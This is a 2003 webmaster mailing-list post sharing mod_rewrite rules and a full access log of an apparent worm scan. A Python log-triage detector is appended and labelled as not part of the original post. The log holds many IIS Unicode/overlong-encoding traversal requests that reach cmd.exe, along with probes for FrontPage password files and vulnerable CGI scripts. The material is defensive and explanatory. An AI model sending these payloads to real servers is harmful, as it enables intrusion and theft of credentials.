[PLUG] Good grief, Charlie Brown (massive worm assault)

Sandy Herring sandy at herring.org
Sun May 25 15:30:02 UTC 2003


Any other webmasters logging traffic like this? Any idea what flavor of worm
is at work? This guy consistently got redir'd since his browser reports
neither referer nor agent...

#######################
# No Tickie, No Washie!
#
RewriteRule /duzintwash\.html$ - [NC,L]
RewriteCond %{HTTP_REFERER} ^-?$ [NC]
RewriteCond %{HTTP_USER_AGENT} ^-?$ [NC]
RewriteRule ^.*$ /duzintwash.html [R=301,L]
RewriteCond %{HTTP_REFERER} NULL [NC]
RewriteCond %{HTTP_USER_AGENT} NULL [NC]
RewriteRule ^.*$ /duzintwash.html [R=301,L]


Here are the access_log entries, showing a search for every imaginable object
(134 in under two minutes)...


as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:50 -0700] "GET /.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:51 -0700] "GET /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3455 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:52 -0700] "GET /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3474 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:53 -0700] "GET /_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3452 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:53 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:54 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:55 -0700] "GET /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:55 -0700] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:56 -0700] "GET /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:57 -0700] "GET /_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:57 -0700] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:58 -0700] "GET /_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:59 -0700] "GET /_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:59 -0700] "GET /_vti_bin/shtml.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:00 -0700] "GET /_vti_bin/shtml.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:00 -0700] "GET /_vti_inf.html HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:01 -0700] "GET /_vti_pvt/administrators.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:02 -0700] "GET /_vti_pvt/authors.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:02 -0700] "GET /_vti_pvt/service.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:03 -0700] "GET /_vti_pvt/users.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:04 -0700] "GET /abc/showcode.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:05 -0700] "GET /carbo.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:05 -0700] "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:06 -0700] "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:07 -0700] "GET /cfdocs/expelval/openfile.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:07 -0700] "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:08 -0700] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3454 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:09 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:09 -0700] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:10 -0700] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:11 -0700] "GET /cgi-bin/aglimpse HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:11 -0700] "GET /cgi-bin/AnyForm2 HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:12 -0700] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:13 -0700] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:13 -0700] "GET /cgi-bin/campas HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:14 -0700] "GET /cgi-bin/cgiwrap HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:15 -0700] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:15 -0700] "GET /cgi-bin/edit.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:16 -0700] "GET /cgi-bin/environ.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:17 -0700] "GET /cgi-bin/faxsurvey HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:17 -0700] "GET /cgi-bin/filemail.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:18 -0700] "GET /cgi-bin/files.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:19 -0700] "GET /cgi-bin/finger HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:19 -0700] "GET /cgi-bin/glimpse HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:20 -0700] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:21 -0700] "GET /cgi-bin/handler HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:21 -0700] "GET /cgi-bin/htmlscript HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:22 -0700] "GET /cgi-bin/info2www HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:23 -0700] "GET /cgi-bin/jj HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:23 -0700] "GET /cgi-bin/maillist.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:24 -0700] "GET /cgi-bin/man.sh HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:25 -0700] "GET /cgi-bin/nph-publish HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:25 -0700] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:26 -0700] "GET /cgi-bin/perl.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:27 -0700] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:27 -0700] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:28 -0700] "GET /cgi-bin/phf HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:29 -0700] "GET /cgi-bin/php.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:29 -0700] "GET /cgi-bin/rguest.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:30 -0700] "GET /cgi-bin/rwwwshell.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:31 -0700] "GET /cgi-bin/survey.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:31 -0700] "GET /cgi-bin/test-cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:32 -0700] "GET /cgi-bin/textcounter.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:33 -0700] "GET /cgi-bin/unlg1.1 HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:33 -0700] "GET /cgi-bin/view-source HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:34 -0700] "GET /cgi-bin/webdist.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:34 -0700] "GET /cgi-bin/webgais HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:35 -0700] "GET /cgi-bin/websendmail HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:36 -0700] "GET /cgi-bin/wguest.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:36 -0700] "GET /cgi-bin/wrap HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:37 -0700] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:38 -0700] "GET /cgi-bin/www-sql HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:38 -0700] "GET /cgi-dos/args.bat HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:39 -0700] "GET /cgi-win/uploader.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:39 -0700] "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:40 -0700] "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:41 -0700] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3452 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:42 -0700] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3465 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:43 -0700] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3471 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:43 -0700] "GET /msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3449 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:44 -0700] "GET /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:45 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:46 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:46 -0700] "GET /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:47 -0700] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:48 -0700] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:49 -0700] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:50 -0700] "GET /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:51 -0700] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:52 -0700] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:53 -0700] "GET /msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:54 -0700] "GET /msadc/..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../winnt/system32/cmd.exe\\?/c\\+dir HTTP/1.0" 301 367 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:54 -0700] "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:55 -0700] "GET /null.ida HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:56 -0700] "GET /null.idc HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:57 -0700] "GET /null.idq HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:58 -0700] "GET /script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3472 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:59 -0700] "GET /script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:59 -0700] "GET /script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:00 -0700] "GET /script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:01 -0700] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:02 -0700] "GET /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3462 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:02 -0700] "GET /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3473 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:03 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3445 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3451 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:05 -0700] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:05 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:06 -0700] "GET /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:07 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:07 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:08 -0700] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:09 -0700] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:09 -0700] "GET /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:10 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:10 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:11 -0700] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:12 -0700] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:13 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:13 -0700] "GET /scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:14 -0700] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:15 -0700] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:15 -0700] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:16 -0700] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:17 -0700] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:18 -0700] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:18 -0700] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:19 -0700] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:20 -0700] "GET /scripts/CGImail.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:20 -0700] "GET /scripts/fpcount.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:21 -0700] "GET /scripts/iisadmin/ism.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:22 -0700] "GET /scripts/issadmin/bdir.htr HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:23 -0700] "GET /scripts/tools/newdsn.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:23 -0700] "GET /search97.vts HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:30 -0700] "GET / HTTP/1.0" 301 357 "-" "-"

Sandy
-- 
Sandy Herring, RHCE                        o              sandy at herring.org
Peck of Pickled Pisces               __  o               http://herring.org/
UNIX or Web authoring questions?  |\/ o\  o  http://herring.org/finger.html
->http://herring.org/techie.html  |/\__/     http://herring.org/pub-key.asc
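
Added example, not part of the original post: a log triage sketch that counts, per client, requests with blank Referer and User-Agent and requests whose path hides a `/` or `\` behind a multi-byte sequence such as `%c0%af`, `%c1%1c` or `%e0%80%af` from the log above. The host names, function names and sample lines are constructed, and the lenient decoder is a model of a decoder that skips UTF-8 validation, not any specific server's code.

```python
import re
from datetime import datetime
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

def hidden_separators(uri):
    """Return (hex bytes, char) for each multi-byte sequence in the path that a
    decoder skipping UTF-8 validation would fold down to an ASCII character."""
    raw = unquote_to_bytes(uri.split("?", 1)[0])
    found, i = [], 0
    while i < len(raw):
        b = raw[i]
        # Sequence length implied by the lead byte (legacy 5/6-byte forms included).
        n = 1 if b < 0xC0 or b > 0xFD else 2 if b < 0xE0 else 3 if b < 0xF0 \
            else 4 if b < 0xF8 else 5 if b < 0xFC else 6
        if n > 1 and i + n <= len(raw):
            cp = b & (0xFF >> (n + 1))
            for c in raw[i + 1:i + n]:
                cp = (cp << 6) | (c & 0x3F)  # no check that c is 10xxxxxx
            if cp < 0x80:  # ASCII reached via a multi-byte sequence: never legitimate
                found.append((raw[i:i + n].hex(), chr(cp)))
            i += n
        else:
            i += 1
    return found

def summarize(lines):
    """Per-host counters for combined-format access_log lines."""
    hosts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        h = hosts.setdefault(m["host"], {"requests": 0, "blank_headers": 0,
                                         "hidden_sep": 0, "first": ts, "last": ts})
        h["requests"] += 1
        h["blank_headers"] += m["ref"] in ("", "-") and m["ua"] in ("", "-")
        h["hidden_sep"] += any(ch in "/\\" for _, ch in hidden_separators(m["uri"]))
        h["first"], h["last"] = min(h["first"], ts), max(h["last"], ts)
    return hosts

SAMPLE = [  # constructed lines in the same format as the log above
    'scanner.example.net - - [25/May/2003:14:58:53 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"',
    'scanner.example.net - - [25/May/2003:14:58:55 -0700] "GET /msadc/..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"',
    'scanner.example.net - - [25/May/2003:14:58:57 -0700] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"',
    'scanner.example.net - - [25/May/2003:14:58:59 -0700] "GET /cgi-bin/test-cgi HTTP/1.0" 301 357 "-" "-"',
    'reader.example.org - - [25/May/2003:14:59:10 -0700] "GET /caf%c3%a9.html HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, h in summarize(SAMPLE).items():
        print(host, h["requests"], h["blank_headers"], h["hidden_sep"])
```

A host whose requests nearly all have blank headers and a large share of hidden separators within a short window matches the pattern in the log above; a well-formed UTF-8 path such as `/caf%c3%a9.html` is not flagged.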